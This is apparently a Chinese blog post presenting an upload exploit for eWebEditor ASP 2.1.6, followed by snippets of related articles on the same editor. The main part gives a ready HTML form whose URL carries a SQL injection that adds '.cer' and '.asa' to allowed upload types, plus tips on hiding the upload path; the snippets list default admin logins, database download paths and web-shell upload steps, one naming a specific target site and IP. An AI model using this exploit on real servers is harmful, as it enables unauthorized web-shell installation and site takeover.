ewebeditor上传漏洞

最新推荐文章于 2024-05-12 22:26:46 发布
原创 最新推荐文章于 2024-05-12 22:26:46 发布 · 740 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一个关于asp版ewebeditor的上传漏洞利用方法,包括如何构造请求参数来绕过安全性限制,实现文件上传。通过设置特定的参数值,如在URL中加入1=2和union操作符,可以实现隐蔽的文件上传路径定制,同时提供了实例代码供参考。 
<H3>ewebeditor asp版 2.1.6 上传漏洞利用程序----</H3><br><br>
<form action="http://xxxx/include/wedit/upload.asp?action=save&type=IMAGE&style=standard' and 1=2 union select S_ID,S_Name,S_Dir,S_CSS,'UploadFile',S_Width,S_Height,S_Memo,S_IsSys,[S_FileExt]%2b'|cer' ,S_FlashExt,[S_ImageExt]%2b'|asa',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>

 这是别人写的,我改了下,其中标红的时要注意的。

第一个地方最好加上1=2,不然实际应用中有可能union的不会被加上

第二个地方是可以自自定义上传路径的,但是一定要是存在的,可以考虑

写道
Admin
ButtonImage
CSS
db
Dialog
Example
Include
SysImage

 

这样可以有一定的隐蔽性,别的就没什么了

ewebeditor文件上传漏洞2.8.0版本(漏洞复现)
qq_46527139的博客
12-02 1366
ewebeditor文件上传漏洞2.8.0版本 漏洞概述 ewebeditor 是常用的网站后台编辑器,此编辑器有asp等版本。 登陆后台之后,可以通过修改上传文件白名单的方法,任意文件上传漏洞危害等级 高危 影响版本 v2.8.0 漏洞复现 在windows2003搭建iis中安装网站 基础环境 组件 版本 os Win2003 Web server Iis6.0 Source code ewebeditorV2.8.0 网站安装 由于该网站为测试,根目录权限为完全
针对ewebeditor编辑器漏洞一次实战经验
渗透测试
09-09 1756
针对ewebeditor编辑器漏洞一次实战经验 目标:http://www.vocal-tec.com/ ip:100.42.49.117 渗透思路: 先扫描目录后台 扫描后挨个登陆,看是否有后台 看后台是否有弱口令 发现登陆不进去 但是意外发现网站采用的是ewebeditor编辑器 百度搜索漏洞ewebeditor目录再扫 发现后台登陆界面,使用弱密码 登陆成功 查看是否有文件上传界面 上传小马 连接小马,上传大马 getshell 可惜本次网站在登陆ewebeditor的后台网站后就无法
ewebeditor php漏洞,ewebeditor for php任意文件上传漏洞
weixin_34952098的博客
03-11 197
漏洞仅测试了最新版v3.8,不知道低版本是否存在此漏洞。PHP版本的ewebeditor并没有使用数据库来保存配置信息,所有信息位于php/config.php中,代码如下:$sUsername = "admin";$sPassword = "admin";$aStyle[1] = "gray|||gray|||office|||../uploadfile/|||550|||350|||rar|...
ewebeditor 3.8 任意文件上传漏洞解析
ice
11-09 1321
   首先这个是别人早都发出来的一个漏洞,exp也写好了,如下 &lt;title&gt;eWebeditoR3.8 for php任意文件上EXP&lt;/title&gt; &lt;form action="" method=post enctype="multipart/form-data"&gt; &lt;INPUT TYPE="hidden" name="MAX_F
22-任意文件上传与编辑器漏洞Ewebeditor、fckeditor、CKFinder、southidceditor等)(四)
最新发布
XLbb的博客
05-12 2250
Ewebeditor是基于浏览器的、所见即所得的在线HTML编辑器。她能够在网页上实现许多桌面编辑软件(如:Word)所具有的强大可视编辑功能。WEB开发人员可以用她把传统的多行文本输入框替换为可视化的富文本输入框,使最终用户可以可视化的发布HTML格式的网页内容。eWebEditor!已基本成为网站内容管理发布的必备工具!
ewebeditor编辑器漏洞
arissa666的博客
10-18 1035
网页在线编辑器,权限限制不严格,弱口令,文件过滤出现问题。
eWebEditor 2.1.6 asp版 上传漏洞利用程序
10-18
eWebEditor 2.1.6 asp版 上传漏洞利用程序 eWebEditor 2.1.6 asp版 上传漏洞利用程序 eWebEditor 2.1.6 asp版 上传漏洞利用程序
eWebEditor7漏洞修复与上传功能安全性提升
- 设置了防止木马程序的功能:这一改进是至关重要的,因为上传功能是潜在的安全漏洞之一,尤其是当攻击者可以通过上传恶意文件来执行木马程序时。通过设置防护措施,能够有效地过滤掉恶意代码和攻击性文件,从而...
漏洞复现篇——ewebeditor编辑器解析漏洞
爱国小白帽
02-18 4726
在线web编辑器,也叫做富文本 编辑器。 富文本编辑器,Rich Text Editor, 简称 RTE, 是一种可内嵌于浏览器,所见即所得的文本编辑器。 富文本编辑器不同于文本编辑器,程序员可到网上下载免费的富文本编辑器内嵌于自己的网站或程序里(当然付费的功能会更强大些),方便用户编辑文章或信息。比较好的文本编辑器有kindeditor,fckeditor等。 这样的程序,能够在网站上写文档的...
eWebEditor网页编辑器漏洞手册
禅心之道的博客
10-19 333
eWebEditoreWebEditor利用基础知识默认后台地址:/ewebeditor/admin_login.asp建议最好检测下admin_style.asp文件是否可以直接访问默认数据库路径:[PATH]/db/ewebeditor.mdb[PATH]/db/db.mdb--某些CMS里是这个数据库也可尝试[PATH]/db/%23ewebeditor.mdb--某些...
ewebeditor2.1.6编辑器
03-01
ewebeditor2.1.6编辑器。
ewebeditor上传结合IIS解析漏洞
收集盒 Book box
08-29 831
google关键字:intext:版权所有:yfcms 利用文件:admin\WebEditor\asp\upload.asp 利用代码: action=save&type=image&style=popup&cusdir=admin8.asp” method=post
web安全-上传漏洞-Ewebeditor编辑器漏洞利用
Coisini的博客
05-31 8138
Ewebeditor简介 漏洞利用 ***默认路径就不一定了,有可能是“edit/admin_login.asp”或者“admin/edit/admin_login.asp”。(默认密码后台:admin,admin) 如果eWebEditor的后台用户名和密码都已经被修改了,那么我们还可以通过下载数据库来获得管理员用户名和密码,数据库默认的下载路径为“/db/ewebeditor.mdb”。下载...
编辑器上传漏洞
weixin_30809173的博客
10-21 141
常见网页编辑器 FCKeditor,Ewebeditor优点:不需要进入网站后台以FCKeditor为例:配置:(ps:按我说的做就行了,就不放图了) 1.在虚拟机中下载FCKeditor,放在wwwroot目录下 2.右键属性,在安全中设置来宾用户的读取,写入,运行权限 3.打开fckeditor中的fckconfig.js 修改第276,277行,php改为...
Ewebeditor 2.1.6上传漏洞 UNION运用-直接得SHELL
收集盒 Book box
04-21 1266
<br />以前曾进过一个网站,把上传部份的asp代码下载回来研究,当时感觉有漏洞但没仔细研究,还以为那是他们自已写的程序。<br />前几天看到ewebeditor漏洞的文章才想起那个网站原来用的也是ewebeditor。今天仔细看了看,发现问题了(2.1
ewebeditor漏洞大全
热门推荐
xysoul的专栏
03-23 1万+
1:默认管理后台: http://www.backlion.com/ewebeditor/admin_login.asp 后台如果能进入: 可点击样式管理: standard 拷贝一份(直接修改改不了) 在拷贝的一份里加入图片类型( asa aaspsp )   然后点预览 在编辑器里点设计    然后直接上传asa大马. 上传后 在代码里可以看到马的位置!
Ewebeditor文件上传问题
Linuxer
07-04 2301
Normal 0 7.8 磅 0 2 false false false MicrosoftInternetExplorer4 <!-- /* S
文件上传-进阶篇之编辑器漏洞
r_deku的博客
03-26 564
1.常见编辑器: FCKeditor、 Ewebeditor、 UEditor、 KindEditor等 2.漏洞环境:使用 phpStudy进行环境搭建 3.漏洞分析:发现存在黑名单文件 4.漏洞复现:绕过服务端黑名单检测 下面开始: 试验结束。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值